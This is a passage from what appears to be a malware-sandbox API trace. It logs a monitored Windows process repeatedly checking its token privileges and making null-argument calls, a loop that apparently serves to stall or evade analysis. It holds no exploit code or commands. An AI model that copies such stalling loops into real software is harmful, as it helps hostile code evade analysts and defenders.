0x3f0 [0016.982] GetCurrentProcess () returned 0xffffffff [0016.982] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.982] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.982] SetLastError (dwErrCode=0x522) [0016.982] CloseHandle (hObject=0x114) returned 1 [0016.982] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.982] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.982] GetLastError () returned 0x578 [0016.982] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.982] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.982] GetCurrentThread () returned 0xfffffffe [0016.982] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.982] GetLastError () returned 0x3f0 [0016.982] GetCurrentProcess () returned 0xffffffff [0016.982] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.982] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.982] SetLastError (dwErrCode=0x522) [0016.982] CloseHandle (hObject=0x114) returned 1 [0016.982] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.982] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.982] GetLastError () returned 0x578 [0016.982] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.982] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.982] GetCurrentThread () returned 0xfffffffe [0016.982] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.982] GetLastError () returned 0x3f0 [0016.982] GetCurrentProcess () returned 0xffffffff [0016.982] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.982] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.982] SetLastError (dwErrCode=0x522) [0016.982] CloseHandle (hObject=0x114) returned 1 [0016.982] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.982] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.982] GetLastError () returned 0x578 [0016.983] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.983] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.983] GetCurrentThread () returned 0xfffffffe [0016.983] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.983] GetLastError () returned 0x3f0 [0016.983] GetCurrentProcess () returned 0xffffffff [0016.983] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.983] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.983] SetLastError (dwErrCode=0x522) [0016.983] CloseHandle (hObject=0x114) returned 1 [0016.983] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.983] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.983] GetLastError () returned 0x578 [0016.983] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.983] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.983] GetCurrentThread () returned 0xfffffffe [0016.983] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.983] GetLastError () returned 0x3f0 [0016.983] GetCurrentProcess () returned 0xffffffff [0016.983] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.983] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.983] SetLastError (dwErrCode=0x522) [0016.983] CloseHandle (hObject=0x114) returned 1 [0016.983] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.983] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.983] GetLastError () returned 0x578 [0016.983] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.983] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.983] GetCurrentThread () returned 0xfffffffe [0016.983] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.983] GetLastError () returned 0x3f0 [0016.983] GetCurrentProcess () returned 0xffffffff [0016.983] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.983] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.983] SetLastError (dwErrCode=0x522) [0016.983] CloseHandle (hObject=0x114) returned 1 [0016.983] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.983] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.983] GetLastError () returned 0x578 [0016.983] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.983] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.983] GetCurrentThread () returned 0xfffffffe [0016.983] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.984] GetLastError () returned 0x3f0 [0016.984] GetCurrentProcess () returned 0xffffffff [0016.984] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.984] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.984] SetLastError (dwErrCode=0x522) [0016.984] CloseHandle (hObject=0x114) returned 1 [0016.984] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.984] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.984] GetLastError () returned 0x578 [0016.984] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.984] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.984] GetCurrentThread () returned 0xfffffffe [0016.984] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.984] GetLastError () returned 0x3f0 [0016.984] GetCurrentProcess () returned 0xffffffff [0016.984] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.984] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.984] SetLastError (dwErrCode=0x522) [0016.984] CloseHandle (hObject=0x114) returned 1 [0016.984] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.984] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.984] GetLastError () returned 0x578 [0016.984] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.984] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.984] GetCurrentThread () returned 0xfffffffe [0016.984] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.984] GetLastError () returned 0x3f0 [0016.984] GetCurrentProcess () returned 0xffffffff [0016.984] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.984] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.984] SetLastError (dwErrCode=0x522) [0016.984] CloseHandle (hObject=0x114) returned 1 [0016.984] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.984] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.985] GetLastError () returned 0x578 [0016.985] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.985] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.985] GetCurrentThread () returned 0xfffffffe [0016.985] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.985] GetLastError () returned 0x3f0 [0016.985] GetCurrentProcess () returned 0xffffffff [0016.985] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.985] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.985] SetLastError (dwErrCode=0x522) [0016.985] CloseHandle (hObject=0x114) returned 1 [0016.985] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.985] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.985] GetLastError () returned 0x578 [0016.985] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.985] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.985] GetCurrentThread () returned 0xfffffffe [0016.985] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.985] GetLastError () returned 0x3f0 [0016.985] GetCurrentProcess () returned 0xffffffff [0016.985] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.985] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.985] SetLastError (dwErrCode=0x522) [0016.985] CloseHandle (hObject=0x114) returned 1 [0016.985] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.985] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.985] GetLastError () returned 0x578 [0016.985] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.985] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.985] GetCurrentThread () returned 0xfffffffe [0016.985] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.985] GetLastError () returned 0x3f0 [0016.985] GetCurrentProcess () returned 0xffffffff [0016.985] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.985] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.985] SetLastError (dwErrCode=0x522) [0016.985] CloseHandle (hObject=0x114) returned 1 [0016.985] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.985] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.985] GetLastError () returned 0x578 [0016.985] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.985] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.985] GetCurrentThread () returned 0xfffffffe [0016.986] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.986] GetLastError () returned 0x3f0 [0016.986] GetCurrentProcess () returned 0xffffffff [0016.986] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.986] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.986] SetLastError (dwErrCode=0x522) [0016.986] CloseHandle (hObject=0x114) returned 1 [0016.986] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.986] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.986] GetLastError () returned 0x578 [0016.986] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.986] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.986] GetCurrentThread () returned 0xfffffffe [0016.986] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.986] GetLastError () returned 0x3f0 [0016.986] GetCurrentProcess () returned 0xffffffff [0016.986] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.986] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.986] SetLastError (dwErrCode=0x522) [0016.986] CloseHandle (hObject=0x114) returned 1 [0016.986] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.986] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.986] GetLastError () returned 0x578 [0016.986] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.986] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.986] GetCurrentThread () returned 0xfffffffe [0016.986] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.986] GetLastError () returned 0x3f0 [0016.986] GetCurrentProcess () returned 0xffffffff [0016.986] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.986] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.986] SetLastError (dwErrCode=0x522) [0016.986] CloseHandle (hObject=0x114) returned 1 [0016.986] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.986] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.986] GetLastError () returned 0x578 [0016.986] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.986] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.986] GetCurrentThread () returned 0xfffffffe [0016.986] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.986] GetLastError () returned 0x3f0 [0016.986] GetCurrentProcess () returned 0xffffffff [0016.986] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.986] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.987] SetLastError (dwErrCode=0x522) [0016.987] CloseHandle (hObject=0x114) returned 1 [0016.987] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.987] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.987] GetLastError () returned 0x578 [0016.987] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.987] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.987] GetCurrentThread () returned 0xfffffffe [0016.987] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.987] GetLastError () returned 0x3f0 [0016.987] GetCurrentProcess () returned 0xffffffff [0016.987] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.987] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.987] SetLastError (dwErrCode=0x522) [0016.987] CloseHandle (hObject=0x114) returned 1 [0016.987] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.987] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.987] GetLastError () returned 0x578 [0016.987] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.987] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.987] GetCurrentThread () returned 0xfffffffe [0016.987] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.987] GetLastError () returned 0x3f0 [0016.987] GetCurrentProcess () returned 0xffffffff [0016.987] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.987] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.987] SetLastError (dwErrCode=0x522) [0016.987] CloseHandle (hObject=0x114) returned 1 [0016.987] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.987] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.987] GetLastError () returned 0x578 [0016.987] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.987] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.987] GetCurrentThread () returned 0xfffffffe [0016.987] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.987] GetLastError () returned 0x3f0 [0016.987] GetCurrentProcess () returned 0xffffffff [0016.987] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.987] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.987] SetLastError (dwErrCode=0x522) [0016.987] CloseHandle (hObject=0x114) returned 1 [0016.987] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.988] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.988] GetLastError () returned 0x578 [0016.988] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.988] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.988] GetCurrentThread () returned 0xfffffffe [0016.988] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.988] GetLastError () returned 0x3f0 [0016.988] GetCurrentProcess () returned 0xffffffff [0016.988] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.988] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.988] SetLastError (dwErrCode=0x522) [0016.988] CloseHandle (hObject=0x114) returned 1 [0016.988] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.988] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.988] GetLastError () returned 0x578 [0016.988] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.988] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.988] GetCurrentThread () returned 0xfffffffe [0016.988] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.988] GetLastError () returned 0x3f0 [0016.988] GetCurrentProcess () returned 0xffffffff [0016.988] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.988] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.988] SetLastError (dwErrCode=0x522) [0016.988] CloseHandle (hObject=0x114) returned 1 [0016.988] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.988] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.988] GetLastError () returned 0x578 [0016.988] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.988] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.988] GetCurrentThread () returned 0xfffffffe [0016.988] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.988] GetLastError () returned 0x3f0 [0016.988] GetCurrentProcess () returned 0xffffffff [0016.988] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.988] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.988] SetLastError (dwErrCode=0x522) [0016.988] CloseHandle (hObject=0x114) returned 1 [0016.988] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.988] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.988] GetLastError () returned 0x578 [0016.988] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.988] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.989] GetCurrentThread () returned 0xfffffffe [0016.989] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: 